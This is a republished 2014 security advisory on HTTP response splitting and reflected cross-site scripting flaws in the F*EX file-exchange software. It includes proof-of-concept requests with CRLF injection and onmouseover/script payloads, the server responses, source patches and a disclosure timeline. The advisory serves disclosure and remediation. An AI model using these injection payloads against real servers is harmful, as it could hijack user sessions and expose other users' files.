F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting

2014-06-03T00:00:00
ID PACKETSTORM:126906
Type packetstorm
Reporter Eric Sesterhenn
Modified 2014-06-03T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
=== LSE Leading Security Experts GmbH - Security Advisory 2014-05-22 ===  
  
F*EX (Frams' Fast File EXchange) - Multiple Issues  
- - ---------------------------------------------------------------------  
  
Affected Versions  
=================  
F*EX (Frams' Fast File EXchange) 20140313-1 as shipped with debian,  
version fex-20140530 and later are not affected.  
  
Issue Overview  
==============  
Technical Risk: medium  
Likelihood of Exploitation: high  
Vendor: Universität Stuttgart  
Vendor URL: http://fex.rus.uni-stuttgart.de/  
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn  
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-22.txt  
Advisory Status: Public  
CVE-Number: CVE-2014-3875, CVE-2014-3876, CVE-2014-3877  
  
  
  
Impact  
======  
It is possible to attack user sessions and to execute JavaScript in  
another users browser. This might enable an attacker to gain access to files  
which are intended for other users of the platform.  
  
  
  
Issue Description  
=================  
While conducting an internal evaluation of the software, LSE Leading  
Security Experts GmbH discovered multiple, remotely exploitable issues with  
F*EX.  
  
1) HTTP Response splitting in rup  
  
CVE-Number: CVE-2014-3875  
  
When inserting encoded newline characters into a request to rup, additional  
HTTP headers can be injected into the reply, as well as new HTML code on the  
top of the website.  
  
- ----------------8<-------------  
$ nc 127.0.0.1 8888  
GET /rup?akey=test%0d%0a%0d%0aHELLO HTTP/1.0  
  
HTTP/1.1 200 OK  
X-Message: OK  
Server: fexsrv  
Expires: 0  
Cache-Control: no-cache  
X-Frame-Options: SAMEORIGIN  
Set-Cookie: akey=test  
  
HELLO; Max-Age=9999; Discard  
Content-Type: text/html; charset=UTF-8  
  
<html>  
<head>  
...  
- ----------------8<-------------  
  
The same attack is possible using a POST request.  
  
  
2) Cross-Site-Scripting issue in rup  
  
CVE-Number: CVE-2014-3876  
  
The parameter akey is reflected unfiltered as part of the HTML page. Some  
characters are forbidden in the GET parameter due to filtering of the  
URL, but this can be circumvented by using a POST parameter.  
Nevertheless, this issue is exploitable via the GET parameter alone,  
with some user interaction.  
  
Opening the following URL opens a popup window, when the cursor  
moves over the back link on the bottom of the page:  
  
http://127.0.0.1:8888/rup?akey=foo" onmouseover=alert(1) bar="  
  
- ----------------8<-------------  
<p>  
<a href="/foc?akey=wow" onmouseover=alert(1) foo="">back to F*EX  
operation control</a>  
</body></html>  
- ----------------8<-------------  
  
  
3) Cross-Site-Scripting issue in fup  
  
CVE-Number: CVE-2014-3877  
  
The parameter addto is reflected only slightly filtered back to  
the user as part of the HTML page. Some characters are forbidden in the GET  
parameter due to filtering of the URL, but this can be circumvented by  
using a POST parameter. Nevertheless, this issue is exploitable via the GET  
parameter alone, with some user interaction.  
  
Opening the following URL opens a popup window, when the cursor  
moves over the recipient entry field:  
  
http://127.0.0.1:8888/fup?addto=%22onmouseover=alert%281%29;bar=%22  
  
- ----------------8<-------------  
<tr title="e-mail address or alias"><td>recipient(s):  
<td><input type="text" name="to" size="96"  
value=""onmouseover=alert(1);bar=""><br>  
</tr>  
- ----------------8<-------------  
  
  
  
4) Cross-Site-Scripting issue in fuc  
  
CVE-Number: CVE-2014-3876  
  
The POST parameter disclaimer is reflected back to the user as part of the  
HTML page.  
  
Setting the disclaimer POST parameter in the change disclaimer  
operation (http://127.0.0.1:8888/fuc?  
disclaimer=CHANGE&akey=2409d2a55e5acfa407929fb10cb8335f) to the  
following value  
  
- ----------------8<-------------  
'"><script>alert(1)</script>  
- ----------------8<-------------  
  
will results in the following HTML code, which opens a popup window:  
  
- ----------------8<-------------  
<pre>  
'"><script>alert(1)</script>  
</pre>  
<p>  
- ----------------8<-------------  
  
An additional attack is possible using the gm POST parameter, by setting  
it to malicious HTML code and supplying a GET parameter group.  
  
It looks like other values might be affected as well, since  
only limited filtering is performed in the CGI parameter  
evaluation.  
  
  
  
Temporary Workaround and Fix  
============================  
LSE Leading Security Experts GmbH advises to deactivate F*EX until the  
vendor  
publishes a complete fix. LSE Leading Security Experts GmbH recommends to  
implement proper filtering mechanisms for all parameters and the  
implementation  
of proper output encoding before reflecting values back to the user.  
  
1) HTTP Response splitting in rup  
  
- --- rup.orig 2014-05-23 08:50:01.558808000 +0200  
+++ rup 2014-05-23 08:55:03.182808000 +0200  
@@ -35,6 +35,7 @@ foreach my $v (param) {  
$vv =~ s/[<>]//g;  
if ($v =~ /^akey$/i) {  
$vv =~ s:[/.]::g;  
+ $vv =~ s/[\W]//g;  
$akey = untaint($vv);  
} elsif ($v =~ /^(from|user)$/i) {  
$from = normalize_address($vv);  
  
  
2) Cross-Site-Scripting issue in rup  
  
The patch from 1) is sufficient to fix this issue as well.  
  
  
3) Cross-Site-Scripting issue in fup  
  
- --- fup.orig 2014-05-23 09:26:12.514808000 +0200  
+++ fup 2014-05-23 09:26:53.794808000 +0200  
@@ -2551,7 +2551,7 @@ sub setparam {  
$replyto = untaint($replyto);  
} elsif ($v eq 'ADDTO') {  
$vv =~ s/\s.*//;  
- - $vv =~ s/[<>]//g;  
+ $vv =~ s/[<>"']//g;  
$addto = untaint(lc($vv)); # if checkaddress($vv);  
} elsif ($v eq 'SUBMIT') {  
$submit = $vv;  
  
  
4) Cross-Site-Scripting issue in fuc  
  
No workaround from LSE. All parameters need to be filtered properly  
and HTML encoded when reflected back to the user.  
  
  
  
History  
=======  
2014-05-22 Issue discovered  
2014-05-23 Issue reported  
2014-05-23 Vendor reply  
2014-05-26 Internal test version supplied by vendor  
2014-05-26 Vendor releases a patch  
2014-05-30 CVE-Numbers assigned  
2014-06-03 Advisory released  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBAgAGBQJTjWHyAAoJEDgSCSGZ4yd8nVMP/2+ZuARnTXsDWbjgSebiU87z  
X1kaTkmqqoXiTLSLshvh+aceRV8RDAf6tn+JIZtHAYK3R1wh3Nt6zLHPOL+Eykh4  
Z4BnI0N0KgD1qgKvaGAZ0/v3XK/6PB1xPLlbo/bxmtyYkqY0bLsC81yRRLe1AQqZ  
WiesJ6LS7Pf+YlVfARB0xUVRA+fWCYK5iriCDEnjqBZ5X2RXWCmnRsdF+g7Dpy41  
vnG7XWqFbggMfV+fnWPT7wzMEBHUYavp24prRxSqJ3tEIrO11/SdbTyU2quxUIL/  
SvGWUHKasRAOvHwIJFS/tCsUhIW+rTF7eUNCqyOoShN7c1Et1UZ0i4LXGqTZi2vI  
logqi6ZUhWW2xfoW2FDUyXcEGUTbZOa58gYK4wwIg+n4ewzEZDhWX3Wul65wgmbs  
72pReu9lCUIPzllvMCMU9DVNc/Jlz9mFiJoFrLBJAjJSymP4Aiva/4CBnzpmWcRo  
Lt02zGYa0jMVgYKGiogw1nUTZPOxvieUQ+tzHhBGBYuwdHRuVLG6Tl9ju4P6GVWX  
CUBtEmmqjPmBQS1CfSotkWhv7K5lCSVFuu8igEzMmk+dV/zahgM7EYf32BlbC634  
lKImwv217DoNQj2fH8dMu2C6bGuQe0BLFDvFMV7UPNMzmngPQc50F95AHi0/adYY  
waSLYfCklm+P2p9HP/E2  
=TBQL  
-----END PGP SIGNATURE-----  
`